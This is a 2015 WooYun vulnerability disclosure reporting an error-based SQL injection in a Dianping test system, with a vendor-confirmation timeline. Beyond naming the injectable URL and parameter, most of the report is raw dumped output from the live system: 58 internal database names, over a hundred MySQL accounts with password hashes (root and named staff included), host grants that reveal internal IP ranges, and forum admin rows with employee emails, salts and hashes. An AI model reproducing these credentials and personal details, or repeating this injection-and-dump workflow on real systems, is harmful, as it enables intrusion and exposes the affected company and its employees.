
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-090759

Title: Dianping's important test system exposed, leading to high-risk injection

Vendor: Dianping (大众点评)

Author: if、so

Submitted: 2015-01-09 11:17

Fixed: 2015-02-23 11:18

Published: 2015-02-23 11:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-09: Details sent to the vendor, awaiting vendor handling
2015-01-09: Vendor confirmed; details disclosed to the vendor only
2015-01-19: Details disclosed to core white hats and relevant domain experts
2015-01-29: Details disclosed to regular white hats
2015-02-08: Details disclosed to intern white hats
2015-02-23: Details disclosed to the public

Brief description:

Dianping's important test system is exposed, leading to high-risk injection; a massive number of databases

Detailed description:

[screenshot: 1111.JPG]


As the screenshot shows, a very important system; it reminds me of that Alipay system that could update balances.
The query has an injection point in mobileno
http://ceshi.51ping.com/getUserInfo?usernickname=iamp912&mobileno=xxxxx
Massive data; since it is a MySQL error-based injection, the data just pours out like water...
databases

available databases [58]:
[*] BAFSExpense
[*] BAFSWorkflow
[*] BAMenu
[*] Bonus
[*] CasServer
[*] DianPing
[*] DianPingAC
[*] DianPingAPI
[*] DianpingBA_FSAccounting
[*] DianpingBA_FSReport
[*] DianPingCOMM
[*] DianPingHR_CRM
[*] DianPingUC
[*] DPBAFCR
[*] DPBeauty
[*] DPEmployeeMD
[*] DPK2Server
[*] DPK2Server​
[*] DPMasterData
[*] DPMobile
[*] DPReview
[*] DPSaleForce
[*] DPSearch
[*] DPSearchOperation
[*] DPShop
[*] DWAnalytic
[*] Forum
[*] HRService
[*] ImageFlow
[*] information_schema
[*] mysql
[*] MySQLDianPingGroup_dbo
[*] nagios
[*] Overseas
[*] PartnerPlatform
[*] performance_schema
[*] Promotion
[*] rabbit
[*] RTXUM
[*] SearchKV
[*] SearchPortal
[*] slb
[*] test
[*] TopList
[*] WeChat
[*] WeiXinAdapter
[*] WeLife
[*] WeLife0
[*] WeLife1
[*] WeLife2
[*] WeLife3
[*] WeLife4
[*] WeLife5
[*] WeLife6
[*] WeLife7
[*] WeLife8
[*] WeLife9
[*] WeSMS


MySQL user accounts and password hashes!!

[*] analytic [1]:
password hash: *19F001D9020254DEA5EACFCDD2022ADE193394B5
[*] analytic_r [1]:
password hash: *C28ECAF8E981E366EC1A37DD6AEA7CE79C684E77
[*] aspnet_API [1]:
password hash: *790FEA0132128BE3070E74B5330C9AD1BF8121AF
[*] aspnet_dianping [1]:
password hash: *5FFFB09B61D2A8F8924E019E7550FA1B4A0C3D86
[*] aspnet_group [1]:
password hash: *B7D11B2BDF597962BA620DCD0D55A6E5BE225420
[*] aspnet_sys [1]:
password hash: *9B41AC44C067B1B617D2FC72A081C7309386DFDD
[*] aspnet_user [1]:
password hash: *B3EDC39CBDDA26F7C6219F6E7A578D070611A1E5
[*] bamenu [1]:
password hash: *8D3259BD11AFB87AB32C640A3D9D316114043AF8
[*] bamenu_r [1]:
password hash: *8336632E2C4CE140134CBC33F3B239E7833B948C
[*] beauty [1]:
password hash: *500CF9BB27B49CC223334416F0FAE2B66346D7D7
[*] beauty_r [1]:
password hash: *0326C36F2C7D7E7CD1834F5925821728B9F58A6A
[*] binlog [1]:
password hash: *A00D14A4D8D5C04C7D7E4162A8FB517F57064F4B
[*] bonus [1]:
password hash: *5CF99EF368F08CB86420B5494EF5CA3D379F3FB0
[*] bonus_r [1]:
password hash: *FA1A5E56B83D235AD1A9610FC3C921AB507D11CB
[*] CMAdmin [1]:
password hash: *3A7A54425366153C359C02C85EFC29C1A8F70245
[*] dbi_user [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] dianping.qa [1]:
password hash: *D853AEE39708F2CB3DF360D973304C62F3E62BDB
[*] dong.wang [1]:
password hash: *64752846C5213656986A833F527A8409A7F25E0A
[*] dp_monitor [1]:
password hash: *4A7FEF7A1B34A8AADD5EDD5454B41F9EA451C182
[*] dpbackup [1]:
password hash: *FBE48E4441193F1B6035D1CECF1841C35F15B0C8
[*] dpbase_auth [2]:
password hash: *9CF1DA5DA163B1CAE7814B68FC51803FF682E02F
password hash: *E0C488F41D8F50592D4F400F687EE615EE96C506
[*] dpclose [1]:
password hash: *42ED5F36FD65842FC1F4EC2387F87ACF8AE526B8
[*] dpcom_adpt [1]:
password hash: *C9524B95C46089CC7980C8142521654AE5F379BC
[*] dpcom_adpt_r [1]:
password hash: *CC8C02A4AA5405A2C8D67FDFEB07EEF4E121C27C
[*] dpcom_cas [1]:
password hash: *E2376662BD94B63BD041DB5D1A655FC4EBFEB608
[*] dpcom_cas_r [1]:
password hash: *16B4680430355726949D5EDF911AEE27FD1638E7
[*] dpcom_crm [1]:
password hash: *414E8D46E0405883575EE6C9C3F714FD9F4BB7FB
[*] dpcom_crm_r [1]:
password hash: *F1731C9D30443DB49E14177F577DCD0870683895
[*] dpcom_dp_r [1]:
password hash: *A0C88EA217F19E8E3ECBBC1725C8E18683DDE583
[*] dpcom_emd [1]:
password hash: *F77FF0183A6D9346832B3FB91332F0594C946EE8
[*] dpcom_emd_r [1]:
password hash: *9403B0F7C41FC75906E501BDB75FA914593769E1
[*] dpcom_fcr [1]:
password hash: *AD791CD94AAEAC714D0AC32B9C123ECEB5AB5F27
[*] dpcom_fcr_r [1]:
password hash: *1154B72078E3C67FCDCE677001D6E18EB679C527
[*] dpcom_job_r [2]:
password hash: *59052B289E65D24267815A289B96534C03A46CF2
password hash: *F3E8AA45E29DE3CFAE8DF92BDB0B02F1B9F7F60B
[*] dpcom_operation [1]:
password hash: *2E9A1BB28DA3D2BE39F9B606F2C2C49576006B14
[*] dpcom_rtxum [1]:
password hash: *339A8801BDF3F416D65CC7441C4BD546619963D0
[*] dpcom_rtxum_r [1]:
password hash: *ACFB58541E33027EDB6E1D313F793BB7F3A77D37
[*] dpcom_sys_r [1]:
password hash: *1489082D3627BEAE116CB1D54CB0DFE0AED1D58C
[*] dpcomm [1]:
password hash: *07FF8600CAAF55278FD5C3099579C1FB6FB30278
[*] DPK2Server [1]:
password hash: *5EF500FE6394B046167A52D0DBCC557E02DE99FC
[*] DPK2Server_r [1]:
password hash: *9181F1A0327C00BC5B433A85C17CEF75A7E0323D
[*] dpk2server​ [1]:
password hash: *4CFEF1A8E5B2DCB44A38D0C285F5CA88BC0C8650
[*] dpk2server​_r [1]:
password hash: *3734FE9EB8CE95400D9EAAA56B57C0C3DE88DE66
[*] dploader [1]:
password hash: *453182DE93C618F5BD689D7D48C7385C6F2414E8
[*] dpmasterdata [1]:
password hash: *13C8DEE9EFCDA24667807ED738AEA1146002EF1B
[*] dpmasterdata_r [1]:
password hash: *AC7E177B2380E7ED47D8101ECF011E8DA56040E1
[*] dpmobile [1]:
password hash: *C7A1D18C5F17D2378DDCFF421693B402E6C008E6
[*] dpmobile_r [1]:
password hash: *6C66D81D6973EFCE44F26D5D72DEC86C24DD28FE
[*] dpreview [1]:
password hash: *09B8D61F2D70C1445BA8DBFA675A3D7B01A3409D
[*] dpreview_r [1]:
password hash: *35A276CDD99F6626CC74C1F30E43E32893AA4FCB
[*] dpsf [1]:
password hash: *2FDD1799DCD93B4082FD6DF2730D896C1D05710C
[*] dpsf_r [1]:
password hash: *6177E8E17AE2C453CFD9D8694393F0509801CBF1
[*] dpshop [1]:
password hash: *298A7BBEDCA34EDF472FD58E9B93C19454ACB757
[*] dpshop_a [1]:
password hash: *37C61A9B440E2E78F9F27ACC87E123004411AFBF
[*] dpshop_a_r [1]:
password hash: *544ACB66CBAD2C1469449DC8AF6B61354EC0268F
[*] dpshop_r [1]:
password hash: *B93BD9DF88D7C804FA41A285EBFF0E0B56FD7BDE
[*] faping.miao [1]:
password hash: *3913DD89BF42283BF000F11B0E5A8B1B8AE68FA7
[*] form [1]:
password hash: *1E88E9B3FA5AA97A70EFF96B90940DBCC3E1F28D
[*] form_r [1]:
password hash: *E21A0AF714880AE287B353D73F786FB190DD427C
[*] forum [1]:
password hash: *9546EDB5DF22CC8F33D04BAC61B9313751847668
[*] forum_r [1]:
password hash: *C458678B137528B3C2687E5BED12065E9F3CEA9D
[*] freshdp [1]:
password hash: *9519BD5A612419AECFB29EE00BD4E1B0B6D74424
[*] FSAccounting [1]:
password hash: *ABB761EF4BB7047F4A4451E91C7A640CA77B91D3
[*] FSAccounting_r [1]:
password hash: *9BBAB3E42477A59AEF6BC022F1B9FDF1131AEF63
[*] fsexpense [1]:
password hash: *B791B0267A8BC1C6607208BFA2A822EBA1845B5E
[*] fsexpense_r [1]:
password hash: *F84C8D615B5E7E810815B35F7473358ECE199F4A
[*] FSReport [1]:
password hash: *EFAE7035DDCFBF44E9E385E657C9240AB1D00D9E
[*] FSReport_r [1]:
password hash: *6BCEF93045C6A52F2135243D3F882433E79CBF2B
[*] fsworkflow [1]:
password hash: *A2DFF8A8C0ECB73063BC5239E84424FC1F30E56F
[*] fsworkflow_r [1]:
password hash: *825E5B4746CF963F11C5B20B5A19E85DFD58517C
[*] gpadmin [1]:
password hash: *47F0B7B2083B2BB6347E25387C51B951EEF355E3
[*] haproxy [1]:
password hash: NULL
[*] hong.wang [1]:
password hash: *5CBE2BEB0F290EB5D19240BCFA49BC7E488D25A0
[*] hrservice [1]:
password hash: *918FDEB7056D3E4E87C0DD9CD80D34C0A873A519
[*] hrservice_r [1]:
password hash: *9A1EA196882B3B2F2D0E802C93AB7CEB1A57577B
[*] imageflow [1]:
password hash: *9C393F2524F5F4306C0F8B0C1462A609EA6BC8CB
[*] imageflow_r [1]:
password hash: *B88C16266E1D813F7B2C432392737A4EDA0709FA
[*] jin.huang [1]:
password hash: *A315229698E611766B51B9F5D3D6C7BEB3FAA453
[*] junyi.lu [1]:
password hash: *45B413A11F267A6D88FABA3859BF62CDA1FBBC48
[*] mail_mirror [1]:
password hash: *85965862612CD0F58295357238E0497A9AC5ADE8
[*] mmm_agent [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] mmm_monitor [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] motion [1]:
password hash: *BA86AC67550BF303544686467BF2D0F202AA1017
[*] motion_r [1]:
password hash: *3DE4C5200193507FA6D0BA4C88C82507C8B9FD7D
[*] myadmin [3]:
password hash: *3913DD89BF42283BF000F11B0E5A8B1B8AE68FA7
password hash: *62ED160211E19F9A5CADFD825DA37543DD2BE685
password hash: *7E0D638B6AE17257BBFA54E2CC21A456ACA7728E
[*] overseas [1]:
password hash: *B2C911E542414B29E3E8A75D5461EA7AFC084E13
[*] overseas_r [1]:
password hash: *9B384DD404F6C80357FE290FD09193F3AF29AA54
[*] qunying.liu [1]:
password hash: *0101D51B80C9CD34BB8FB2CD989B593A98CFE0F7
[*] repl [1]:
password hash: *A424E797037BF97C19A2E88CF7891C5C2038C039
[*] root [1]:
password hash: *714468107AEBF86EFCEFCAB5C926C98A62F6330D
[*] ryan.yu [1]:
password hash: *35FE1E375F7930F2ECCB86D92B35E364DE564360
[*] SearchKV [1]:
password hash: *E992FFA323AC0381F1899C87F0BE062E6CDBEF10
[*] searchportal [1]:
password hash: *69359FB1600495BC3AEA3F1B6296E8C9B6C827E7
[*] searchportal_r [1]:
password hash: *10435EFC825CBC251267D12BCA46E0BCE962C139
[*] slb [1]:
password hash: *66D08FCE4E10FD3546F1E42951986930D07783BC
[*] slb_r [1]:
password hash: *CB5453876F1BB23CA492E69FABEDE87039787D35
[*] tempuser_L1U0 [1]:
password hash: NULL
[*] tempuser_L2U0 [1]:
password hash: NULL
[*] tempuser_L3U0 [1]:
password hash: NULL
[*] tempuser_L3U1 [1]:
password hash: NULL
[*] toplist [1]:
password hash: *73EF5C496F8AF09E1D174541A1155F2434035BB6
[*] toplist_r [1]:
password hash: *F0955BBF5D5B5CFC0A350EDF760810DFA387F45C
[*] wechat [1]:
password hash: *E52C80E8F7CE26E9C8E1EE642A52117635F6E2CD
[*] wechat_r [1]:
password hash: *499F4FEF0FD5AF03FBA354301DEACAFD095D2C73
[*] welife [1]:
password hash: *6701BC80A45A5301A4B909EB066A63BC990D1170
[*] welife_r [1]:
password hash: *A811AE4EAA8037C0A01794EEAF28D565BF218082
[*] wesms [1]:
password hash: *EFABFFEC769A3B9F7722B869CEE91A520922F0B6
[*] wesms_r [1]:
password hash: *E2AFCA11A06B04994923DE784640D0FD6F1208EA
[*] zhiyuan.li [1]:
password hash: *6D6273671B77E34ACDE9B0872CE240C042892EE3


[*] 'analytic'@'10.1.%'
[*] 'analytic'@'10.101.%'
[*] 'analytic'@'10.128.%'
[*] 'analytic'@'10.2.%'
[*] 'analytic'@'192.168.%'
[*] 'analytic_r'@'10.1.%'
[*] 'analytic_r'@'10.101.%'
[*] 'analytic_r'@'10.128.%'
[*] 'analytic_r'@'10.2.%'
[*] 'analytic_r'@'192.168.%'
[*] 'aspnet_API'@'10.1.%'
[*] 'aspnet_API'@'10.128.%.%'
[*] 'aspnet_API'@'192.168.%'
[*] 'aspnet_dianping'@'10.1.%'
[*] 'aspnet_dianping'@'10.128.%'
[*] 'aspnet_dianping'@'10.254.25%'
[*] 'aspnet_dianping'@'192.168.%'
[*] 'aspnet_group'@'10.1.%'
[*] 'aspnet_group'@'10.128.%.%'
[*] 'aspnet_group'@'192.168.%'
[*] 'aspnet_sys'@'10.1.%'
[*] 'aspnet_sys'@'10.128.%.%'
[*] 'aspnet_sys'@'192.168.%'
[*] 'aspnet_user'@'10.1.%'
[*] 'aspnet_user'@'10.128.%.%'
[*] 'aspnet_user'@'192.168.%'
[*] 'bamenu'@'10.1.%'
[*] 'bamenu'@'10.101.%'
[*] 'bamenu'@'10.128.%'
[*] 'bamenu'@'10.2.%'
[*] 'bamenu'@'192.168.%'
[*] 'bamenu_r'@'10.1.%'
[*] 'bamenu_r'@'10.101.%'
[*] 'bamenu_r'@'10.128.%'
[*] 'bamenu_r'@'10.2.%'
[*] 'bamenu_r'@'192.168.%'
[*] 'beauty'@'10.1.%'
[*] 'beauty'@'10.101.%'
[*] 'beauty'@'10.128.%'
[*] 'beauty'@'10.2.%'
[*] 'beauty'@'192.168.%'
[*] 'beauty_r'@'10.1.%'
[*] 'beauty_r'@'10.101.%'
[*] 'beauty_r'@'10.128.%'
[*] 'beauty_r'@'10.2.%'
[*] 'beauty_r'@'192.168.%'
[*] 'binlog'@'10.1.%'
[*] 'binlog'@'10.128.%.%'
[*] 'binlog'@'192.168.%'
[*] 'bonus'@'10.1.%'
[*] 'bonus'@'10.101.%'
[*] 'bonus'@'10.128.%'
[*] 'bonus'@'10.2.%'
[*] 'bonus'@'192.168.%'
[*] 'bonus_r'@'10.1.%'
[*] 'bonus_r'@'10.101.%'
[*] 'bonus_r'@'10.128.%'
[*] 'bonus_r'@'10.2.%'
[*] 'bonus_r'@'192.168.%'
[*] 'CMAdmin'@'10.128.%.%'
[*] 'CMAdmin'@'192.168.%'
[*] 'dbi_user'@'10.128.%.%'
[*] 'dbi_user'@'192.168.%'
[*] 'dianping.qa'@'10.1.77.%'
[*] 'dianping.qa'@'10.128.%'
[*] 'dianping.qa'@'192.168.%'
[*] 'dong.wang'@'10.1.1.62'
[*] 'dp_monitor'@'10.1.1.111'
[*] 'dp_monitor'@'localhost'
[*] 'dpbackup'@'localhost'
[*] 'dpbase_auth'@'10.1.2.119'
[*] 'dpbase_auth'@'10.1.2.139'
[*] 'dpbase_auth'@'10.1.77.211'
[*] 'dpclose'@'localhost'
[*] 'dpcom_adpt'@'10.1.%'
[*] 'dpcom_adpt'@'10.101.%'
[*] 'dpcom_adpt'@'10.128.%'
[*] 'dpcom_adpt'@'10.2.%'
[*] 'dpcom_adpt'@'192.168.%'
[*] 'dpcom_adpt_r'@'10.1.%'
[*] 'dpcom_adpt_r'@'10.101.%'
[*] 'dpcom_adpt_r'@'10.128.%'
[*] 'dpcom_adpt_r'@'10.2.%'
[*] 'dpcom_adpt_r'@'192.168.%'
[*] 'dpcom_cas'@'10.1.%'
[*] 'dpcom_cas'@'10.128.%'
[*] 'dpcom_cas'@'192.168.%'
[*] 'dpcom_cas_r'@'10.1.%'
[*] 'dpcom_cas_r'@'10.128.%'
[*] 'dpcom_cas_r'@'192.168.%'
[*] 'dpcom_crm'@'10.1.%'
[*] 'dpcom_crm'@'10.101.%'
[*] 'dpcom_crm'@'10.128.%'
[*] 'dpcom_crm'@'10.2.%'
[*] 'dpcom_crm'@'192.168.%'
[*] 'dpcom_crm_r'@'10.1.%'
[*] 'dpcom_crm_r'@'10.101.%'
[*] 'dpcom_crm_r'@'10.128.%'
[*] 'dpcom_crm_r'@'10.2.%'
[*] 'dpcom_crm_r'@'192.168.%'
[*] 'dpcom_dp_r'@'10.128.%.%'
[*] 'dpcom_dp_r'@'192.168.%'
[*] 'dpcom_emd'@'10.1.%'
[*] 'dpcom_emd'@'10.101.%'
[*] 'dpcom_emd'@'10.128.%'
[*] 'dpcom_emd'@'10.2.%'
[*] 'dpcom_emd'@'192.168.%'
[*] 'dpcom_emd_r'@'10.1.%'
[*] 'dpcom_emd_r'@'10.101.%'
[*] 'dpcom_emd_r'@'10.128.%'
[*] 'dpcom_emd_r'@'10.2.%'
[*] 'dpcom_emd_r'@'192.168.%'
[*] 'dpcom_fcr'@'10.1.%'
[*] 'dpcom_fcr'@'10.128.%'
[*] 'dpcom_fcr'@'192.168.%'
[*] 'dpcom_fcr_r'@'10.1.%'
[*] 'dpcom_fcr_r'@'10.128.%'
[*] 'dpcom_fcr_r'@'192.168.%'
[*] 'dpcom_job_r'@'10.1.%'
[*] 'dpcom_job_r'@'10.128.%.%'
[*] 'dpcom_job_r'@'192.168.%'
[*] 'dpcom_operation'@'10.1.%'
[*] 'dpcom_operation'@'10.101.%'
[*] 'dpcom_operation'@'10.128.%'
[*] 'dpcom_operation'@'10.2.%'
[*] 'dpcom_operation'@'192.168.%'
[*] 'dpcom_rtxum'@'10.1.%'
[*] 'dpcom_rtxum'@'10.128.%'
[*] 'dpcom_rtxum'@'192.168.%'
[*] 'dpcom_rtxum_r'@'10.1.%'
[*] 'dpcom_rtxum_r'@'10.128.%'
[*] 'dpcom_rtxum_r'@'192.168.%'
[*] 'dpcom_sys_r'@'192.168.%'
[*] 'dpcomm'@'10.1.%'
[*] 'dpcomm'@'10.128.%'
[*] 'DPK2Server'@'10.1.%'
[*] 'DPK2Server'@'10.101.%'
[*] 'DPK2Server'@'10.128.%'
[*] 'DPK2Server'@'10.2.%'
[*] 'DPK2Server'@'192.168.%'
[*] 'DPK2Server_r'@'10.1.%'
[*] 'DPK2Server_r'@'10.101.%'
[*] 'DPK2Server_r'@'10.128.%'
[*] 'DPK2Server_r'@'10.2.%'
[*] 'DPK2Server_r'@'192.168.%'
[*] 'dpk2server​'@'10.1.%'
[*] 'dpk2server​'@'10.101.%'
[*] 'dpk2server​'@'10.128.%'
[*] 'dpk2server​'@'10.2.%'
[*] 'dpk2server​'@'192.168.%'
[*] 'dpk2server​_r'@'10.1.%'
[*] 'dpk2server​_r'@'10.101.%'
[*] 'dpk2server​_r'@'10.128.%'
[*] 'dpk2server​_r'@'10.2.%'
[*] 'dpk2server​_r'@'192.168.%'
[*] 'dploader'@'localhost'
[*] 'dpmasterdata'@'10.1.%'
[*] 'dpmasterdata'@'10.101.%'
[*] 'dpmasterdata'@'10.128.%'
[*] 'dpmasterdata'@'10.2.%'
[*] 'dpmasterdata'@'192.168.%'
[*] 'dpmasterdata_r'@'10.1.%'
[*] 'dpmasterdata_r'@'10.101.%'
[*] 'dpmasterdata_r'@'10.128.%'
[*] 'dpmasterdata_r'@'10.2.%'
[*] 'dpmasterdata_r'@'192.168.%'
[*] 'dpmobile'@'10.1.%'
[*] 'dpmobile'@'10.128.%'
[*] 'dpmobile'@'192.168.%'
[*] 'dpmobile_r'@'10.1.%'
[*] 'dpmobile_r'@'10.128.%'
[*] 'dpmobile_r'@'192.168.%'
[*] 'dpreview'@'10.1.%'
[*] 'dpreview'@'10.101.%'
[*] 'dpreview'@'10.128.%'
[*] 'dpreview'@'10.2.%'
[*] 'dpreview'@'192.168.%'
[*] 'dpreview_r'@'10.1.%'
[*] 'dpreview_r'@'10.101.%'
[*] 'dpreview_r'@'10.128.%'
[*] 'dpreview_r'@'10.2.%'
[*] 'dpreview_r'@'192.168.%'
[*] 'dpsf'@'10.1.%'
[*] 'dpsf'@'10.101.%'
[*] 'dpsf'@'10.128.%'
[*] 'dpsf'@'10.2.%'
[*] 'dpsf'@'192.168.%'
[*] 'dpsf_r'@'10.1.%'
[*] 'dpsf_r'@'10.101.%'
[*] 'dpsf_r'@'10.128.%'
[*] 'dpsf_r'@'10.2.%'
[*] 'dpsf_r'@'192.168.%'
[*] 'dpshop'@'10.1.%'
[*] 'dpshop'@'10.101.%'
[*] 'dpshop'@'10.128.%'
[*] 'dpshop'@'10.2.%'
[*] 'dpshop'@'192.168.%'
[*] 'dpshop_a'@'10.1.%'
[*] 'dpshop_a'@'10.101.%'
[*] 'dpshop_a'@'10.128.%'
[*] 'dpshop_a'@'10.2.%'
[*] 'dpshop_a'@'192.168.%'
[*] 'dpshop_a_r'@'10.1.%'
[*] 'dpshop_a_r'@'10.101.%'
[*] 'dpshop_a_r'@'10.128.%'
[*] 'dpshop_a_r'@'10.2.%'
[*] 'dpshop_a_r'@'192.168.%'
[*] 'dpshop_r'@'10.1.%'
[*] 'dpshop_r'@'10.101.%'
[*] 'dpshop_r'@'10.128.%'
[*] 'dpshop_r'@'10.2.%'
[*] 'dpshop_r'@'192.168.%'
[*] 'faping.miao'@'10.1.1.62'
[*] 'form'@'10.1.%'
[*] 'form'@'10.128.%'
[*] 'form'@'10.254.251.%'
[*] 'form'@'192.168.%'
[*] 'form_r'@'10.1.%'
[*] 'form_r'@'10.128.%'
[*] 'form_r'@'192.168.%'
[*] 'forum'@'10.1.%'
[*] 'forum'@'10.101.%'
[*] 'forum'@'10.128.%'
[*] 'forum'@'10.2.%'
[*] 'forum'@'192.168.%'
[*] 'forum_r'@'10.1.%'
[*] 'forum_r'@'10.101.%'
[*] 'forum_r'@'10.128.%'
[*] 'forum_r'@'10.2.%'
[*] 'forum_r'@'192.168.%'
[*] 'freshdp'@'10.128.%.%'
[*] 'freshdp'@'192.168.%'
[*] 'FSAccounting'@'10.1.%'
[*] 'FSAccounting'@'10.101.%'
[*] 'FSAccounting'@'10.128.%'
[*] 'FSAccounting'@'10.2.%'
[*] 'FSAccounting'@'192.168.%'
[*] 'FSAccounting_r'@'10.1.%'
[*] 'FSAccounting_r'@'10.101.%'
[*] 'FSAccounting_r'@'10.128.%'
[*] 'FSAccounting_r'@'10.2.%'
[*] 'FSAccounting_r'@'192.168.%'
[*] 'fsexpense'@'10.1.%'
[*] 'fsexpense'@'10.101.%'
[*] 'fsexpense'@'10.128.%'
[*] 'fsexpense'@'10.2.%'
[*] 'fsexpense'@'192.168.%'
[*] 'fsexpense_r'@'10.1.%'
[*] 'fsexpense_r'@'10.101.%'
[*] 'fsexpense_r'@'10.128.%'
[*] 'fsexpense_r'@'10.2.%'
[*] 'fsexpense_r'@'192.168.%'
[*] 'FSReport'@'10.1.%'
[*] 'FSReport'@'10.101.%'
[*] 'FSReport'@'10.128.%'
[*] 'FSReport'@'10.2.%'
[*] 'FSReport'@'192.168.%'
[*] 'FSReport_r'@'10.1.%'
[*] 'FSReport_r'@'10.101.%'
[*] 'FSReport_r'@'10.128.%'
[*] 'FSReport_r'@'10.2.%'
[*] 'FSReport_r'@'192.168.%'
[*] 'fsworkflow'@'10.1.%'
[*] 'fsworkflow'@'10.101.%'
[*] 'fsworkflow'@'10.128.%'
[*] 'fsworkflow'@'10.2.%'
[*] 'fsworkflow'@'192.168.%'
[*] 'fsworkflow_r'@'10.1.%'
[*] 'fsworkflow_r'@'10.101.%'
[*] 'fsworkflow_r'@'10.128.%'
[*] 'fsworkflow_r'@'10.2.%'
[*] 'fsworkflow_r'@'192.168.%'
[*] 'gpadmin'@'10.1.1.239'
[*] 'haproxy'@'192.168.%'
[*] 'hong.wang'@'10.128.%.%'
[*] 'hong.wang'@'192.168.%'
[*] 'hrservice'@'10.1.%'
[*] 'hrservice'@'10.101.%'
[*] 'hrservice'@'10.128.%'
[*] 'hrservice'@'10.2.%'
[*] 'hrservice'@'192.168.%'
[*] 'hrservice_r'@'10.1.%'
[*] 'hrservice_r'@'10.101.%'
[*] 'hrservice_r'@'10.128.%'
[*] 'hrservice_r'@'10.2.%'
[*] 'hrservice_r'@'192.168.%'
[*] 'imageflow'@'10.1.%'
[*] 'imageflow'@'10.101.%'
[*] 'imageflow'@'10.128.%'
[*] 'imageflow'@'10.2.%'
[*] 'imageflow'@'192.168.%'
[*] 'imageflow_r'@'10.1.%'
[*] 'imageflow_r'@'10.101.%'
[*] 'imageflow_r'@'10.128.%'
[*] 'imageflow_r'@'10.2.%'
[*] 'imageflow_r'@'192.168.%'
[*] 'jin.huang'@'10.128.%.%'
[*] 'jin.huang'@'192.168.%'
[*] 'junyi.lu'@'10.1.1.%'
[*] 'mail_mirror'@'10.1.%'
[*] 'mmm_agent'@'10.1.77.%'
[*] 'mmm_monitor'@'10.1.77.%'
[*] 'motion'@'10.1.%'
[*] 'motion'@'10.101.%'
[*] 'motion'@'10.128.%'
[*] 'motion'@'10.2.%'
[*] 'motion'@'192.168.%'
[*] 'motion_r'@'10.1.%'
[*] 'motion_r'@'10.101.%'
[*] 'motion_r'@'10.128.%'
[*] 'motion_r'@'10.2.%'
[*] 'motion_r'@'192.168.%'
[*] 'myadmin'@'10.1.%'
[*] 'myadmin'@'10.1.1.186'
[*] 'myadmin'@'10.1.1.231'
[*] 'myadmin'@'10.1.1.62'
[*] 'myadmin'@'192.168.%'
[*] 'myadmin'@'localhost'
[*] 'overseas'@'10.1.%'
[*] 'overseas'@'10.101.%'
[*] 'overseas'@'10.128.%'
[*] 'overseas'@'10.2.%'
[*] 'overseas'@'192.168.%'
[*] 'overseas_r'@'10.1.%'
[*] 'overseas_r'@'10.101.%'
[*] 'overseas_r'@'10.128.%'
[*] 'overseas_r'@'10.2.%'
[*] 'overseas_r'@'192.168.%'
[*] 'qunying.liu'@'10.1.%'
[*] 'repl'@'10.1.77.%'
[*] 'root'@'localhost'
[*] 'ryan.yu'@'10.128.%.%'
[*] 'ryan.yu'@'10.254.25%'
[*] 'ryan.yu'@'192.168.%'
[*] 'SearchKV'@'10.128.%.%'
[*] 'SearchKV'@'192.168.%'
[*] 'searchportal'@'10.1.%'
[*] 'searchportal'@'10.128.%'
[*] 'searchportal'@'192.168.%'
[*] 'searchportal_r'@'10.1.%'
[*] 'searchportal_r'@'10.128.%'
[*] 'searchportal_r'@'192.168.%'
[*] 'slb'@'10.1.%'
[*] 'slb'@'10.101.%'
[*] 'slb'@'10.128.%'
[*] 'slb'@'10.2.%'
[*] 'slb'@'192.168.%'
[*] 'slb_r'@'10.1.%'
[*] 'slb_r'@'10.101.%'
[*] 'slb_r'@'10.128.%'
[*] 'slb_r'@'10.2.%'
[*] 'slb_r'@'192.168.%'
[*] 'tempuser_L1U0'@'10.254.25%'
[*] 'tempuser_L1U0'@'192.168.%'
[*] 'tempuser_L2U0'@'10.254.25%'
[*] 'tempuser_L2U0'@'192.168.%'
[*] 'tempuser_L3U0'@'10.254.25%'
[*] 'tempuser_L3U0'@'192.168.%'
[*] 'tempuser_L3U1'@'10.254.25%'
[*] 'tempuser_L3U1'@'192.168.%'
[*] 'toplist'@'10.1.%'
[*] 'toplist'@'10.101.%'
[*] 'toplist'@'10.128.%'
[*] 'toplist'@'10.2.%'
[*] 'toplist'@'192.168.%'
[*] 'toplist_r'@'10.1.%'
[*] 'toplist_r'@'10.101.%'
[*] 'toplist_r'@'10.128.%'
[*] 'toplist_r'@'10.2.%'
[*] 'toplist_r'@'192.168.%'
[*] 'wechat'@'10.1.%'
[*] 'wechat'@'10.101.%'
[*] 'wechat'@'10.128.%'
[*] 'wechat'@'10.2.%'
[*] 'wechat'@'192.168.%'
[*] 'wechat_r'@'10.1.%'
[*] 'wechat_r'@'10.101.%'
[*] 'wechat_r'@'10.128.%'
[*] 'wechat_r'@'10.2.%'
[*] 'wechat_r'@'192.168.%'
[*] 'welife'@'10.1.%'
[*] 'welife'@'10.101.%'
[*] 'welife'@'10.128.%'
[*] 'welife'@'10.2.%'
[*] 'welife'@'192.168.%'
[*] 'welife_r'@'10.1.%'
[*] 'welife_r'@'10.101.%'
[*] 'welife_r'@'10.128.%'
[*] 'welife_r'@'10.2.%'
[*] 'welife_r'@'192.168.%'
[*] 'wesms'@'10.1.%'
[*] 'wesms'@'10.101.%'
[*] 'wesms'@'10.128.%'
[*] 'wesms'@'10.2.%'
[*] 'wesms'@'192.168.%'
[*] 'wesms_r'@'10.1.%'
[*] 'wesms_r'@'10.101.%'
[*] 'wesms_r'@'10.128.%'
[*] 'wesms_r'@'10.2.%'
[*] 'wesms_r'@'192.168.%'
[*] 'zhiyuan.li'@'10.1.%'
[*] 'zhiyuan.li'@'10.128.%.%'
[*] 'zhiyuan.li'@'192.168.%'


This data could leak the data of the entire business line
Too many databases to tell apart, so I just picked one to try
Saw the forum database, tried to find the Discuz forum; searched for a long time and finally found it
bbs.51ping.com/bbs

uid,myid,myidkey,salt,regip,email,secques,regdate,username,password,lastloginip,lastlogintime
1,<blank>,<blank>,99afcf,hidden,es.ba@dianping.com,<blank>,1419326409,admin,96056643fb8657d1d73f2e7b0a9c79e1,0,0
12,<blank>,<blank>,59ef42,192.168.224.166,zhijun.ding@dianping.com,<blank>,1419498405,zhijun.ding,1da428a557230e065eee7e063611a595,0,0
